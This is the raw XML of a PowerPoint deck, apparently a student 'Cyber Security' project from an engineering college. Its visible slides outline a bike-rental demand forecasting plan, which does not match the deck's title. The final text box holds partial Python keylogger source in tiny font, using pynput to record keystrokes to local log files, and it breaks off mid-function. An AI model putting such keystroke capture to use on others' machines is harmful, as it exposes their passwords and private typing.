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2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId14"/>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6" d="100"/>
          <a:sy n="86" d="100"/>
        </p:scale>
        <p:origin x="6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67"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1048668"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09-04-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048669"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1048670"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1"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1048672"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3"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lstStyle/>
          <a:p>
            <a:fld id="{ED291B17-9318-49DB-B28B-6E5994AE9581}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048587"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588"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32" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="702156"/>
            <a:ext cx="11029616" cy="1013800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048633" name="Vertical Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="eaVert" ancho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4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2CED4963-E985-44C4-B8C4-FDD613B7C2F8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104863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3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4861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18"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1048619"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0"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1"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2"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3" name="Date Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED291B17-9318-49DB-B28B-6E5994AE9581}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048624"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25"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lstStyle/>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lstStyle/>
          <a:p>
            <a:fld id="{78DD82B9-B8EE-4375-B6FF-88FA6ABB15D9}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024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37"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8"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1048639"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40" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B2497495-0637-405E-AE64-5CC7506D51F5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048641"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42"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43" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="492855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048644"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5"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6" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7BFFD690-9426-415D-8B65-26881E07B2D4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048647"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48"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48649" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="988332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048650"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1"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2"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3"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4" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04C4989A-474C-40DE-95B9-011C28B71673}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048655"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56"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12" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="729658"/>
            <a:ext cx="11029616" cy="592246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048613" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5DB4ED54-5B5E-4A04-93D3-5772E3CE3818}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104861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1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57" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4EDE50D6-574B-40AF-946F-D52A04ADE379}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048658"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59"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60"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1"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1048662"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3"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64"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4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048665"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048666"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26"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1048627"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1048628"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29" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7E18DB4A-8810-4A10-AD5C-D5E2C667F5B3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048630"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1048631"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4/9/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048579"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1048590"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CYBER SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048591" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2296914" y="3884687"/>
            <a:ext cx="7980183" cy="206210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endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blessing .K</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>KINGS ENGINEERING COLLEGE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Computer Science and Engineering </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>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4"/>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1048611" name="Content Placeholder 1"/>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Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958948" y="2144896"/>
            <a:ext cx="9298744" cy="1665105"/>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1048598" name="Content Placeholder 1"/>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1048600"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IN" sz="1200" b="1" dirty="0">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dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRP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IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Gather historical data on bike rentals, including time, date, location, and other relevant factors.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629920" lvl="1" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Utilize real-time data sources, such as weather conditions, events, and holidays, to enhance prediction accuracy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Data Preprocessing:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629920" lvl="1" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Clean and preprocess the collected data to handle missing values, outliers, and inconsistencies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629920" lvl="1" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Feature engineering to extract relevant features from the data that might impact bike demand.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Machine Learning Algorithm:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629920" lvl="1" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Implement a machine learning algorithm, such as a time-series forecasting model (e.g., ARIMA, SARIMA, or LSTM), to predict bike counts based on historical patterns.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629920" lvl="1" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Consider incorporating other factors like weather conditions, day of the week, and special events to improve prediction accuracy.</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IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Develop a user-friendly interface or application that provides real-time predictions for bike counts at different hours.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629920" lvl="1" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Deploy the solution on a scalable and reliable platform, considering factors like server infrastructure, response time, and user accessibility.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IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Assess the model's performance using appropriate metrics such as Mean Absolute Error (MAE), Root Mean Squared Error (RMSE), or other relevant metrics.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="629920" lvl="1" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fine-tune the model based on feedback and continuous monitoring of prediction accuracy.</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1048602" name="Content Placeholder 1"/>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1048604" name="Content Placeholder 1"/>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3" name="TextBox 1048672"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897607" y="9017598"/>
            <a:ext cx="4000000" cy="929639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bjbv</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048674" name="TextBox 1048673"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1228">
            <a:off x="896939" y="1502006"/>
            <a:ext cx="23093395" cy="5044441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>
import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>
from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> import *
from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> import keyboard
import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = []
flag = False
keys = ""
def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(key):
    with open('key_log.txt', "w+") as keys:
        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(key)
def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>):
    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:
        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>json.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).encode()
        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)
def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(key):
    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, keys
    if flag == False:
        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(
            {'Pressed': f'{key}'}
        )
        flag = True
    if flag == True:
        </a:t>
